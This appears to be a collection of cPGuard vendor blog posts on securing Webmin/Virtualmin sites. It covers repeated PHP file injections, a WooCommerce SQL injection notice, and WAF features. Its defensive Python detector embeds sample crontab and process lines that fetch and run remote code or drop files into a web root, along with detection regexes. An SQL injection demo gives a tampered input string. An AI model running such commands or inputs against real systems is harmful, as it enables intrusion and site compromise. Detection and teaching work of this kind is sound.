Secure websites in Webmin/Virtualmin, Webmin antivirus/antimalware

Secure Webmin/Virtualmin Hosting

Keeping the websites on your server safe and secure is a real challenge these days. You should always expect attacks and compromise attempts, especially against popular CMSes like WordPress, so every web host or server owner has to put in real effort to stay up to date, defend against such attacks and keep their websites safe.

How can cPGuard help you secure websites on your Webmin/Virtualmin server?

All the modules in the cPGuard Security Suite work side by side to protect your websites from attacks. cPGuard secures your server at several layers, blocks intrusion attempts, reduces server load and overhead, and drastically cuts the admin hours spent dealing with attacks and compromised websites. Given below are some of the cPGuard modules that protect your server:

  1. File Scanner – This module acts as an antivirus/antimalware scanner for websites hosted in Webmin/Virtualmin. Integrated with the cleanup module, it detects and removes malicious file uploads and code injections in your websites.
  2. Web Application Firewall – cPGuard's ModSecurity Web Application Firewall rules stop generic web attacks against your websites before they reach the application. The commercial WAF rules by Malware.Expert protect your Webmin/Virtualmin client websites by effectively blocking generic web attacks, specific web attacks, bot attacks and more.
  3. Distributed system firewall – The IPDB distributed system firewall for Webmin/Virtualmin blocks traffic from known and currently active attack source IPs. It is very effective at stopping many attacks before they even reach your application server, which also reduces server overhead.
  4. Reputation monitoring – The reputation monitoring module keeps an eye on the status of your IP addresses and domains and alerts you if they are listed on blacklists.

Many other functions are integrated into cPGuard to help you run your server securely and cleanly. Please read the full feature list at https://opsshield.com/standalone.html

If you wish to secure your Webmin/Virtualmin server, please follow the installation instructions. Installation is very simple and we have pre-built templates for Webmin/Virtualmin servers.

Given below are sample cPGuard installation steps on a Webmin/Virtualmin server.

Repeated PHP File Injections

Injecting malicious code into a legitimate file, or dropping a malicious file into an application folder, is a very common type of malware attack. In some specific cases the same file or folder is infected repeatedly: even if the scanner detects the infection and takes action against it, it reappears and floods the scanner log. In this blog we discuss some common causes of such repeated injections, based on cases we have handled in the past.

1. Cron Jobs

This is a very common cause of repeated file injections and is easy to find. In this scenario the user account is compromised and the attacker uses that access to install malicious cron jobs that repeatedly inject files into the account.

Given below is an example from an active campaign specifically targeting cPanel accounts, in which accounts compromised through the campaign have been abused with similar cron jobs for the past couple of weeks.

Other kinds of cron jobs download a file from a remote location and execute it. Such a file then runs as a daemon on the server, monitoring the account and uploading or updating malicious code in it.

2. Process or daemon running under the user account

This type of abuse is also common and a bit more aggressive than scheduled cron-based injections. Because it is a running process, it actively watches the targeted file or location and re-adds the infection whenever the malicious code is missing. It is easy to find because the process keeps running and consumes resources: list the processes owned by the affected user with the "ps" command and look for anything the user does not recognise. A few such examples are given below…

cPGuard includes a process monitoring module which periodically scans the processes running under user accounts, takes action against them and reports them if they match any known abuse pattern.
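As an added example for sections 1 and 2 (not cPGuard's own code or its abuse patterns), the following Python script applies a few assumed indicator heuristics to a constructed user crontab and a constructed "ps -o user,pid,cmd" listing: jobs or processes that fetch remote code and pipe it to an interpreter, download into public_html, or run a binary from a hidden temp directory are flagged, while the legitimate entries are not.

```python
import re

# Constructed sample data (not real captures): a user crontab and a ps listing
# like the ones the post describes, each with one legitimate entry.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/php /home/user1/backup.php
*/5 * * * * wget -q -O - http://198.51.100.7/x.txt | sh > /dev/null 2>&1
* * * * * curl -s http://203.0.113.9/a.php -o /home/user1/public_html/wp-content/x.php
@reboot nohup /tmp/.cache/upd > /dev/null 2>&1 &
"""
SAMPLE_PS = """\
user1 4021 php-fpm: pool user1
user1 4077 /tmp/.cache/upd
user1 4102 sh -c curl -s http://203.0.113.9/a.php -o /home/user1/public_html/x.php
"""

# Heuristic indicators (assumed for this example, not cPGuard's own patterns)
PATTERNS = {
    "remote_fetch_piped_to_interpreter": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|perl|php|python)\b"),
    "remote_fetch_into_webroot": re.compile(r"\b(curl|wget)\b.*-[oO]\s*\S*public_html\S*"),
    "binary_in_hidden_tmp_dir": re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/\."),
}

def parse_crontab(text):
    """Yield (schedule, command) per job line; handles @reboot-style schedules."""
    for line in (l.strip() for l in text.splitlines()):
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)           # five time fields + command
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield sched, cmd

def match_indicators(command):
    """Names of all indicator patterns that match one command string."""
    return [name for name, rx in PATTERNS.items() if rx.search(command)]

def flag_cron_jobs(text):
    """[(schedule, command, indicators)] for crontab jobs matching an indicator."""
    return [(s, c, h) for s, c in parse_crontab(text) if (h := match_indicators(c))]

def flag_processes(ps_text):
    """[(pid, command, indicators)] from 'ps -o user,pid,cmd' style lines (no header)."""
    rows = (line.split(None, 2) for line in ps_text.splitlines() if line.strip())
    return [(pid, cmd, h) for _u, pid, cmd in rows if (h := match_indicators(cmd))]
```

On a live system the same functions can be fed the output of "crontab -l -u USER" and "ps -u USER -o user,pid,cmd --no-headers"; a hit is a starting point for investigation, not proof of compromise.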

3. Hidden code in nulled third-party modules

This method is harder to find because it requires verifying the source code of every file in the account. It often happens with nulled WordPress plugins/themes that users install to save some money. Such packages cause far more damage and can ultimately leave your website unusable and vulnerable. You need to go through each file, or use a malware scanner like cPGuard, to find such hidden malicious code. An example of such a case is given below; it runs every time the website is accessed and injects malicious code into the index.php file.

Conclusion

Repeated file infections are not limited to these causes; they can happen for other reasons as well. These are, however, the most common ones, and cPGuard is already trained to handle many such cases. Ultimately, though, you must find the security hole through which the attacker gained access to the account and patch it. Otherwise the attacker can come back at any time and repeat the action.

SQL Injection Vulnerability Discovered in WooCommerce – Generic SQL Injection Attacks

On 15th July 2021, a critical SQL injection vulnerability in the WooCommerce e-commerce platform and a related plugin was reported, potentially affecting millions of websites around the world. The vulnerabilities were detected on the 13th of July and fixed in WooCommerce versions 3.3.6 to 5.5.1 and WooCommerce Blocks versions 2.5.16 to 5.5.1. Although WooCommerce pushed a forced automatic update to all affected websites, it is recommended to check your website manually and make sure everything is up to date.

What is the impact of the exploit? As per the announcement from WooCommerce, this vulnerability allows an unauthenticated attacker to access arbitrary data in an online store's database. If a store was affected, the exposed information depends on what that site stores but could include order, customer and administrative information.

So what is an SQL injection attack and how can it be prevented? SQL injection is a web security vulnerability that allows an attacker to interfere with the SQL queries an application makes to its database. It lets an attacker make the database disclose information or behave in ways it is not supposed to. It is a common attack vector and can mostly be detected with website auditing tools. The developer of every application must properly validate and filter user input, whether it arrives through a form or in the URI, and must never let that input become part of the query text itself.
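As an added illustration of the point above (not WooCommerce code; it uses Python with an in-memory SQLite table of constructed rows), a query assembled by string concatenation lets a crafted customer value rewrite the WHERE clause and return every order, while the parameterized query binds the same value as data and an allow-list check rejects it outright. In WordPress plugin code the equivalent binding is done with $wpdb->prepare().

```python
import re
import sqlite3

def make_db():
    """In-memory store table with constructed sample rows (not real customer data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE orders (id INTEGER, customer TEXT, email TEXT, total REAL)")
    con.executemany("INSERT INTO orders VALUES (?, ?, ?, ?)", [
        (1, "alice", "alice@example.com", 42.0),
        (2, "bob", "bob@example.com", 17.5),
        (3, "carol", "carol@example.com", 99.9),
    ])
    return con

def orders_vulnerable(con, customer):
    """WHERE clause built by string concatenation: the input is parsed as SQL."""
    sql = "SELECT id, customer, email FROM orders WHERE customer = '" + customer + "'"
    return con.execute(sql).fetchall()

def orders_safe(con, customer):
    """Parameterized query: the driver binds the value, so it can never become SQL."""
    sql = "SELECT id, customer, email FROM orders WHERE customer = ?"
    return con.execute(sql, (customer,)).fetchall()

# Allow-list for a customer handle (assumed format for this example)
CUSTOMER_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def orders_validated(con, customer):
    """Defense in depth: reject input outside the expected shape, then bind it."""
    if not CUSTOMER_RE.fullmatch(customer):
        raise ValueError("invalid customer identifier")
    return orders_safe(con, customer)

# A value that closes the quoted literal and appends an always-true condition
TAMPERED = "alice' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable query, tampered input:", len(orders_vulnerable(db, TAMPERED)), "rows")  # 3
    print("parameterized query, tampered input:", len(orders_safe(db, TAMPERED)), "rows")     # 0
```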

Can cPGuard protect your website from such vulnerabilities? Yes. The cPGuard WAF, powered by the Malware.Expert ModSecurity rule set, protects your websites from such generic attacks, including SQL injection, so cPGuard can already defend against them. It also works together with the IPDB Distributed Firewall module, which detects and blocks repeat attacking IPs across all our customer servers.

Do we really need resource consumption settings for cPGuard?

What do you mean by resource consumption?

Every piece of software needs some resources to run on a system and perform its operations. The amount each program needs differs and depends on the task it performs. Software that runs multiple algorithms, does complex computations and performs many file and network operations is usually highly resource-intensive (specifically in CPU, RAM and disk I/O). An antivirus scanner falls into this category, as it performs a large number of file reads and writes, content analysis, pattern recognition and comparisons.

In a server environment resources are limited and must remain available on demand for the server's primary task. Therefore antivirus scanners have settings to limit the resources they may consume, or to schedule scans for off-peak hours.

So why does cPGuard not let users limit it?

We have strictly maintained a "performance-oriented" approach while building cPGuard and wanted it to run smoothly on even the smallest servers. The cPGuard scanner engine core is built to work fast and consume minimal resources. Some of the major points that help us achieve better performance with fewer resources are:

  • We scan only relevant files/locations, unlike competitors that scan a lot of unnecessary locations and waste server resources.
  • Our core scanner is single-threaded and will not cause a server-wide CPU spike, so CPU limiting is not required for our scanner daemon.
  • Our highly efficient and optimised algorithms leave only a very small memory footprint.
  • Our IPDB rules contain only active attack sources, so only a minimal rule set is loaded and network overhead is reduced.
  • The WAF contains a minimal but generic rule set that effectively blocks most major web attacks.

Do you have any proof?

Yes, we have, and we can confidently stand by our statement. The biggest proof is that in the last 4 years the number of complaints about resource usage has been close to ZERO. In most systems the component that can cause a load spike on the server is the scanner module. Our scanner is fine-tuned to avoid such a scenario and is one of the fastest scanners available on the market. It is tested and confirmed that the cPGuard scanner engine is more than 7x faster than those of our competitors. The screenshot below of the manual scan option in cPGuard shows it completing a scan of 41K+ files in just 7 minutes.

So is there any advantage to Resource Consumption settings?

Yes, there is, if the scanner module is resource hungry: limits help reduce server load, but they drastically slow down the scanning process and keep resources engaged for a longer time. As stated earlier, that is not a problem with cPGuard, so you do not need to worry about configuring such values or monitoring our services.

Ok, I have a few more questions…

We are happy to address them. Feel free to reach our support team and we will be more than happy to answer your questions!

What are the advantages of cPGuard WAF compared to competing solutions?

What is cPGuard WAF?

The cPGuard WAF module is an important part of the cPGuard security suite, protecting your websites from malicious traffic and attacks. It is powered by Malware.Expert commercial ModSecurity rules and offers a wide variety of protection levels. With cPGuard you can deploy the WAF rules easily and flexibly and enforce maximum website protection according to your preference. We have rules to protect against major attacks like the following, which are explained in the sections below:

  1. WordPress/Joomla and other CMS brute-force attacks
  2. Crawler bot and exploit/vulnerability scanner prevention
  3. Generic attacks like XSS, SQL injection, WP abuses, etc.
  4. Malicious file uploads via the web
  5. Zero-day exploit blocking, etc.

What are the important modules of cPGuard WAF?

The cPGuard WAF consists of various types of rules, each of which stops different types of attacks. The major advantage of enabling the WAF with cPGuard is that you can select the set of rules you wish to enable for your websites. Unlike competing WAF solutions, our rules are carefully separated and let customers choose their protection level.

  • RBL Protection:- This provides advanced DDoS protection for POST attacks [brute-force, script exploits] and blocks common abusive IP addresses collected through our network of servers with cPGuard installed. We recommend turning this ON if you are getting too many POST attacks, as it blocks many attacks before they reach your application and helps reduce server load.
  • Captcha Protection:- Recommended. This ruleset requires all users to verify that they are not bots before accessing CMS login pages [WordPress, Joomla, etc.] or submitting login credentials. Once identified as real users, they can log in to their website. This can greatly reduce the load caused by brute-force attacks. You can also define the set of URIs you wish to protect with the captcha system, which makes the protection more powerful and flexible.
  • WEBSHELL protection:- If you enable this ruleset, your server is protected from the execution of PHP shells such as the following:
    • Phoenix WebShell
    • FilesMan
    • c99shell
    • b374k
    • WSO
    • Ani-Shell

    The front page of a web shell may still open, but command execution [copy, delete, move, etc.] is blocked. You can enable this rule set if you control all the web apps on your server.

  • SCANNER protection:- Recommended. This helps keep bad crawlers away from your system. They are a major headache for web hosts and cause unnecessary use of system resources. It can block:
    • Bad User-Agents
    • Bad search engine crawlers (which cause high loads)

In addition to the above rule sets, the WAF includes rules to stop brute-force attacks and to enable web-based file scanning.

Why is cPGuard WAF better than competing WAF solutions?

Our WAF is top-notch at blocking major automated attacks with less server load than competing WAF solutions. In addition, it causes very few or zero false positives in most cases, with an option to whitelist rules if you find isolated issues with any of them.

In general, cPGuard WAF outperforms competing WAF solutions on the following points:

  • We have a very minimal but generic set of WAF rules, which offers a wide range of protection with very little server load
  • Rules are generic and can therefore block the same types of attacks delivered through different vectors
  • We closely watch the latest exploits and release rules to protect against them
  • We have explicit generic rules to protect common CMS systems
  • Our Captcha protection system is one of the best and can stop brute-force and bot attacks against your CMSes
  • A cloud-based central system analyzes the latest web threats and blocks them
  • The WAF module is coupled with the IPDB Firewall in the core, which helps stop attacks at the system firewall before they even reach the application server

Have more questions?

If you have been misled by marketing emails about our software and WAF module and would like to know more, please feel free to reach us. Our team is always happy to answer your questions and explain the cPGuard software.